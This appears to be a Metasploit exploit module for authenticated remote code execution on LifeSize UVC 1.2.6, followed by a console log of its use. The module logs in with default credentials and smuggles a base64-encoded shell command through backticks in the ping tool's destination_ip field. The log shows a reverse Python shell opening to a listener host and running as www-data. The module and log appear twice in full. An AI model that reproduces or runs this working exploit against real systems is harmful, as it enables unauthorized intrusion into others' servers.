brandonprry/lifesize_admin_ping.rb

## lifesize_admin_ping.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "LifeSize UVC 1.2.6 Authenticated RCE via Ping",
      'Description'    => %q{
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
        ],
      'References'     =>
        [
          ['URL', 'http://pastebin.com/FueRwWhe']
        ],
      'Platform'       => ['unix', 'linux'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['LifeSize UVC version <= 1.2.6', {}]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python telnet netcat'
            }
        },
      'DisclosureDate' => "Mar 21 2014",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
          OptString.new('USERNAME', [true, 'The username to authenticate with', 'administrator']),
          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin123'])
        ], self.class)
  end

  def exploit
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/accounts/login/')
    })

    res.body =~ /name='csrfmiddlewaretoken' value='(.*)'/
    token = $1

    post = {
      'csrfmiddlewaretoken' => token,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/accounts/'),
      'method' => 'POST',
      'vars_post' => post,
      'headers' => {
        'Referer' => 'https://' + datastore['RHOST'] + '/accounts/'
      },
      'cookie' => 'csrftoken=' + token
    })

    cookie = res.get_cookies

    new_cookie = 'csrftoken=' + token + '; ' + cookie

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'),
      'cookie' => new_cookie
    })

    res.body =~ /name='csrfmiddlewaretoken' value='(.*)'/
    token = $1

    new_cookie = 'csrftoken=' + token + '; ' + cookie

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'),
      'method' => 'POST',
      'headers' => {
        'Referer' => 'https://' + datastore['RHOST'] + '/server-admin/operations/diagnose/ping/'
      },
      'cookie' => new_cookie,
      'data' => 'csrfmiddlewaretoken='+token+'&source_ip=' + datastore['RHOST'] + '&destination_ip=go`echo ' + Rex::Text.encode_base64(payload.encoded) + '|base64 --decode|sh`ogle.com'
    })
  end
end

__END__

msf exploit(lifesize_admin_ping) > show options

Module options (exploit/linux/http/lifesize_admin_ping):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
PASSWORD   admin123         yes       The password to authenticate with
Proxies                     no        Use a proxy chain
RHOST      172.31.16.99     yes       The target address
RPORT      443              yes       The target port
TARGETURI  /                yes       The URI of the vulnerable instance
USERNAME   administrator    yes       The username to authenticate with
VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  172.31.16.166    yes       The listen address
LPORT  4444             yes       The listen port
SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

Id  Name
--  ----
0   LifeSize UVC version <= 1.2.6


msf exploit(lifesize_admin_ping) > exploit

[*] Started reverse handler on 172.31.16.166:4444
[*] Command shell session 3 opened (172.31.16.166:4444 -> 172.31.16.99:42603) at 2014-03-21 11:02:43 -0700

bash: no job control in this shell
www-data@fdsa:~$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@fdsa:~$ exit

[*] 172.31.16.99 - Command shell session 3 closed.  Reason: Died from EOFError

msf exploit(lifesize_admin_ping) >
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
	super(update_info(info,
	'Name' => "LifeSize UVC 1.2.6 Authenticated RCE via Ping",
	'Description' => %q{
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	],
	'References' =>
	[
	['URL', 'http://pastebin.com/FueRwWhe']
	],
	'Platform' => ['unix', 'linux'],
	'Arch' => ARCH_CMD,
	'Targets' =>
	[
	['LifeSize UVC version <= 1.2.6', {}]
	],
	'Privileged' => false,
	'Payload' =>
	{
	'DisableNops' => true,
	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'generic perl python telnet netcat'
	}
	},
	'DisclosureDate' => "Mar 21 2014",
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
	OptString.new('USERNAME', [true, 'The username to authenticate with', 'administrator']),
	OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin123'])
	], self.class)
	end

	def exploit
	res = send_request_cgi({
	'uri' => normalize_uri(target_uri.path, '/accounts/login/')
	})

	res.body =~ /name='csrfmiddlewaretoken' value='(.*)'/
	token = $1

	post = {
	'csrfmiddlewaretoken' => token,
	'username' => datastore['USERNAME'],
	'password' => datastore['PASSWORD']
	}

	res = send_request_cgi({
	'uri' => normalize_uri(target_uri.path, '/accounts/'),
	'method' => 'POST',
	'vars_post' => post,
	'headers' => {
	'Referer' => 'https://' + datastore['RHOST'] + '/accounts/'
	},
	'cookie' => 'csrftoken=' + token
	})

	cookie = res.get_cookies

	new_cookie = 'csrftoken=' + token + '; ' + cookie

	res = send_request_cgi({
	'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'),
	'cookie' => new_cookie
	})

	res.body =~ /name='csrfmiddlewaretoken' value='(.*)'/
	token = $1

	new_cookie = 'csrftoken=' + token + '; ' + cookie

	res = send_request_cgi({
	'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'),
	'method' => 'POST',
	'headers' => {
	'Referer' => 'https://' + datastore['RHOST'] + '/server-admin/operations/diagnose/ping/'
	},
	'cookie' => new_cookie,
	'data' => 'csrfmiddlewaretoken='+token+'&source_ip=' + datastore['RHOST'] + '&destination_ip=go`echo ' + Rex::Text.encode_base64(payload.encoded) + '\|base64 --decode\|sh`ogle.com'
	})
	end
	end

	__END__

	msf exploit(lifesize_admin_ping) > show options

	Module options (exploit/linux/http/lifesize_admin_ping):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	PASSWORD admin123 yes The password to authenticate with
	Proxies no Use a proxy chain
	RHOST 172.31.16.99 yes The target address
	RPORT 443 yes The target port
	TARGETURI / yes The URI of the vulnerable instance
	USERNAME administrator yes The username to authenticate with
	VHOST no HTTP server virtual host


	Payload options (cmd/unix/reverse_python):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	LHOST 172.31.16.166 yes The listen address
	LPORT 4444 yes The listen port
	SHELL /bin/bash yes The system shell to use.


	Exploit target:

	Id Name
	-- ----
	0 LifeSize UVC version <= 1.2.6


	msf exploit(lifesize_admin_ping) > exploit

	[*] Started reverse handler on 172.31.16.166:4444
	[*] Command shell session 3 opened (172.31.16.166:4444 -> 172.31.16.99:42603) at 2014-03-21 11:02:43 -0700

	bash: no job control in this shell
	www-data@fdsa:~$ id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	www-data@fdsa:~$ exit

	[*] 172.31.16.99 - Command shell session 3 closed. Reason: Died from EOFError

	msf exploit(lifesize_admin_ping) >